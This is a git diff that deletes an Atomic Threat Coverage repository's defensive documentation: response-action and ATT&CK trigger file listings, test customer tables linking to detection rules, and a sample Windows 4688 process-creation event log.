 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_1605_get_ability_to_remove_user_account.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2001_list_victims_of_security_alert.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2002_list_host_vulnerabilities.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2003_put_compromised_accounts_on_monitoring.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2101_list_hosts_communicated_with_internal_domain.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2102_list_hosts_communicated_with_internal_ip.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2103_list_hosts_communicated_with_internal_url.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2104_analyse_domain_name.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2105_analyse_ip.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2106_analyse_uri.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2107_list_hosts_communicated_by_port.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2108_list_hosts_connected_to_vpn.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2109_list_hosts_connected_to_intranet.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2110_list_data_transferred.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2111_collect_transferred_data.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2112_identify_transferred_data.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2113_list_hosts_communicated_with_external_domain.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2114_list_hosts_communicated_with_external_ip.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2115_list_hosts_communicated_with_external_url.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2116_find_data_transferred_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2201_list_users_opened_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2202_collect_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2203_list_email_message_receivers.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2204_make_sure_email_message_is_phishing.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2205_extract_observables_from_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2301_list_files_created.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2302_list_files_modified.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2303_list_files_deleted.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2304_list_files_downloaded.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2305_list_files_with_tampered_timestamps.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2306_find_file_by_path.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2307_find_file_by_metadata.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2308_find_file_by_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2309_find_file_by_format.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2310_find_file_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2311_collect_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2312_analyse_file_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2313_analyse_windows_pe.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2314_analyse_macos_macho.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2315_analyse_unix_elf.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2316_analyse_ms_office_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2317_analyse_pdf_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2318_analyse_script.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2401_list_processes_executed.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2402_find_process_by_executable_path.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2403_find_process_by_executable_metadata.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2404_find_process_by_executable_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2405_find_process_by_executable_format.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2406_find_process_by_executable_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2501_list_registry_keys_modified.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2502_list_registry_keys_deleted.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2503_list_registry_keys_accessed.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2504_list_registry_keys_created.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2505_list_services_created.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2506_list_services_modified.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2507_list_services_deleted.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_2601_list_users_authenticated.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3001_patch_vulnerability.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3101_block_external_ip_address.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3102_block_internal_ip_address.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3103_block_external_domain.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3104_block_internal_domain.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3105_block_external_url.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3106_block_internal_url.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3107_block_port_external_communication.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3108_block_port_internal_communication.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3109_block_user_external_communication.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3110_block_user_internal_communication.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3111_block_data_transferring_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3201_block_domain_on_email.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3202_block_sender_on_email.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3203_quarantine_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3301_quarantine_file_by_format.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3302_quarantine_file_by_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3303_quarantine_file_by_path.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3304_quarantine_file_by_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3401_block_process_by_executable_path.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3402_block_process_by_executable_metadata.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3403_block_process_by_executable_hash.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3404_block_process_by_executable_format.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3405_block_process_by_executable_content_pattern.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3501_disable_system_service.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_3601_lock_user_account.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_4001_report_incident_to_external_companies.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_4101_remove_rogue_network_device.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_4201_delete_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_4301_remove_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_4501_remove_registry_key.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_4502_remove_service.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_4601_revoke_authentication_credentials.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_4602_remove_user_account.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5001_reinstall_host_from_golden_image.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5002_restore_data_from_backup.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5101_unblock_blocked_ip.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5102_unblock_blocked_domain.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5103_unblock_blocked_url.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5104_unblock_blocked_port.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5105_unblock_blocked_user.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5201_unblock_domain_on_email.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5202_unblock_sender_on_email.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5203_restore_quarantined_email_message.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5301_restore_quarantined_file.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5401_unblock_blocked_process.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5501_enable_disabled_service.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_5601_unlock_locked_user_account.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_6001_develop_incident_report.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Actions/RA_6002_conduct_lessons_learned_exercise.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Playbooks/RP_0001_phishing_email.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Stages/RS0001.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Stages/RS0002.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Stages/RS0003.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Stages/RS0004.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Stages/RS0005.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Stages/RS0006.md
 delete mode 100644 Atomic_Threat_Coverage/Response_Stages/responsestages.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1002.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1003.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1004.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1005.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1007.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1009.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1010.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1012.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1014.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1015.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1016.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1018.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1022.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1023.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1027.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1028.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1030.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1031.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1032.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1033.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1035.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1036.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1037.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1038.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1040.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1042.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1044.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1045.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1046.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1047.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1048.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1049.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1050.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1053.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1055.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1056.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1057.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1058.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1059.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1060.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1062.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1063.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1064.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1065.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1069.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1070.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1071.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1073.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1074.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1075.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1076.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1077.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1081.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1082.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1083.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1084.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1085.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1086.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1087.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1088.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1089.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1090.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1093.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1095.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1096.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1097.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1098.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1099.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1100.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1101.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1102.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1103.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1105.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1106.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1107.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1110.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1112.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1113.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1114.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1115.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1117.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1118.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1119.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1121.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1122.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1123.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1124.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1126.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1127.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1128.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1130.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1132.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1135.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1136.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1137.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1138.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1139.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1140.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1141.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1142.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1143.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1144.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1145.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1146.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1147.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1148.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1150.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1151.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1152.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1153.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1154.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1155.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1156.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1158.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1159.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1160.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1163.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1164.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1165.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1166.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1168.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1169.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1170.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1173.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1174.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1176.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1179.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1180.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1183.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1191.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1193.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1196.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1197.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1201.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1202.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1204.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1206.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1207.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1208.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1214.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1215.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1216.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1217.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1218.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1219.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1220.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1222.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1223.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1482.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1485.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1489.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1490.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1496.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1500.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1501.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1502.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1504.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1505.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1518.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1519.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1529.md
 delete mode 100644 Atomic_Threat_Coverage/Triggers/T1531.md
 delete mode 100644 Atomic_Threat_Coverage/Use_Cases/UC_0001_TESTUSECASE.md
 delete mode 100644 Atomic_Threat_Coverage/Use_Cases/UC_0002_INITIALACCESS.md

diff --git a/Atomic_Threat_Coverage/Customers/CU_0001_TESTCUSTOMER.md b/Atomic_Threat_Coverage/Customers/CU_0001_TESTCUSTOMER.md
deleted file mode 100644
index 8f06b11..0000000
--- a/Atomic_Threat_Coverage/Customers/CU_0001_TESTCUSTOMER.md
+++ /dev/null
@@ -1,8 +0,0 @@
-| Title              | CU_0001_TESTCUSTOMER |
-|:-------------------|:--------------------|
-| **Customer Name**  | TESTCUSTOMER |
-| **Description**    | Some text description here. It will be merged into one line.   |
-| **Use Cases**      | <ul><li>[UC_0001_TESTUSECASE](../Use_Cases/UC_0001_TESTUSECASE.md)</li><li>[UC_0002_INITIALACCESS](../Use_Cases/UC_0002_INITIALACCESS.md)</li></ul> |
-| **Data Needed**    |<ul><li>[DN_0001_4688_windows_process_creation](../Data_Needed/DN_0001_4688_windows_process_creation.md)</li><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
-| **Logging Policy** | <ul><li>[LP_0001_windows_audit_process_creation](../Logging_Policies/LP_0001_windows_audit_process_creation.md)</li><li>[LP_0002_windows_audit_process_creation_with_commandline](../Logging_Policies/LP_0002_windows_audit_process_creation_with_commandline.md)</li><li>[LP_0003_windows_sysmon_process_creation](../Logging_Policies/LP_0003_windows_sysmon_process_creation.md)</li></ul> |
-| **Detection Rule** | <ul><li>[SquiblyTwo](../Detection_Rules/win_bypass_squiblytwo.md)</li><li>[Cmdkey Cached Credentials Recon](../Detection_Rules/win_cmdkey_recon.md)</li><li>[CMSTP UAC Bypass via COM Object Access](../Detection_Rules/win_cmstp_com_object_access.md)</li><li>[CMSTP Execution](../Detection_Rules/sysmon_cmstp_execution.md)</li><li>[Exploit for CVE-2015-1641](../Detection_Rules/win_exploit_cve_2015_1641.md)</li><li>[Exploit for CVE-2017-0261](../Detection_Rules/win_exploit_cve_2017_0261.md)</li><li>[Dridex Process Pattern](../Detection_Rules/win_malware_dridex.md)</li></ul> |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Customers/CU_0002_TESTCUSTOMER2.md b/Atomic_Threat_Coverage/Customers/CU_0002_TESTCUSTOMER2.md
deleted file mode 100644
index 922170d..0000000
--- a/Atomic_Threat_Coverage/Customers/CU_0002_TESTCUSTOMER2.md
+++ /dev/null
@@ -1,8 +0,0 @@
-| Title              | CU_0002_TESTCUSTOMER2 |
-|:-------------------|:--------------------|
-| **Customer Name**  | TESTCUSTOMER2 |
-| **Description**    | Some text description here. It will be merged into one line.   |
-| **Use Cases**      | <ul></ul> |
-| **Data Needed**    |<ul><li>[DN_0001_4688_windows_process_creation](../Data_Needed/DN_0001_4688_windows_process_creation.md)</li><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
-| **Logging Policy** | <ul><li>[LP_0001_windows_audit_process_creation](../Logging_Policies/LP_0001_windows_audit_process_creation.md)</li><li>[LP_0002_windows_audit_process_creation_with_commandline](../Logging_Policies/LP_0002_windows_audit_process_creation_with_commandline.md)</li><li>[LP_0003_windows_sysmon_process_creation](../Logging_Policies/LP_0003_windows_sysmon_process_creation.md)</li></ul> |
-| **Detection Rule** | <ul><li>[SquiblyTwo](../Detection_Rules/win_bypass_squiblytwo.md)</li><li>[Cmdkey Cached Credentials Recon](../Detection_Rules/win_cmdkey_recon.md)</li><li>[CMSTP UAC Bypass via COM Object Access](../Detection_Rules/win_cmstp_com_object_access.md)</li></ul> |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0001_4688_windows_process_creation.md b/Atomic_Threat_Coverage/Data_Needed/DN0001_4688_windows_process_creation.md
deleted file mode 100644
index 212c58c..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0001_4688_windows_process_creation.md
+++ /dev/null
@@ -1,58 +0,0 @@
-| Title              | DN0001_4688_windows_process_creation       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Windows process creation log, not including command line |
-| **Logging Policy** | <ul><li>[LP0001_windows_audit_process_creation](../Logging_Policies/LP0001_windows_audit_process_creation.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4688.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/event-4688.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>NewProcessId</li><li>NewProcessName</li><li>TokenElevationType</li><li>ProcessId</li><li>ProcessPid</li><li>TargetUserSid</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetLogonId</li><li>ParentProcessName</li><li>MandatoryLabel</li><li>ProcessName</li><li>Image</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
-    <EventID>4688</EventID>
-    <Version>2</Version>
-    <Level>0</Level>
-    <Task>13312</Task>
-    <Opcode>0</Opcode>
-    <Keywords>0x8020000000000000</Keywords>
-    <TimeCreated SystemTime="2015-11-12T02:24:52.377352500Z" />
-    <EventRecordID>2814</EventRecordID>
-    <Correlation />
-    <Execution ProcessID="4" ThreadID="400" />
-    <Channel>Security</Channel>
-    <Computer>WIN-GG82ULGC9GO.contoso.local</Computer>
-    <Security />
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-18</Data>
-    <Data Name="SubjectUserName">WIN-GG82ULGC9GO$</Data>
-    <Data Name="SubjectDomainName">CONTOSO</Data>
-    <Data Name="SubjectLogonId">0x3e7</Data>
-    <Data Name="NewProcessId">0x2bc</Data>
-    <Data Name="NewProcessName">C:\\Windows\\System32\\rundll32.exe</Data>
-    <Data Name="TokenElevationType">%%1938</Data>
-    <Data Name="ProcessId">0xe74</Data>
-    <Data Name="TargetUserSid">S-1-5-21-1377283216-344919071-3415362939-1104</Data>
-    <Data Name="TargetUserName">dadmin</Data>
-    <Data Name="TargetDomainName">CONTOSO</Data>
-    <Data Name="TargetLogonId">0x4a5af0</Data>
-    <Data Name="ParentProcessName">C:\\Windows\\explorer.exe</Data>
-    <Data Name="MandatoryLabel">S-1-16-8192</Data>
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md b/Atomic_Threat_Coverage/Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md
deleted file mode 100644
index f47a708..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md
+++ /dev/null
@@ -1,59 +0,0 @@
-| Title              | DN0002_4688_windows_process_creation_with_commandline       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Windows process creation log, including command line |
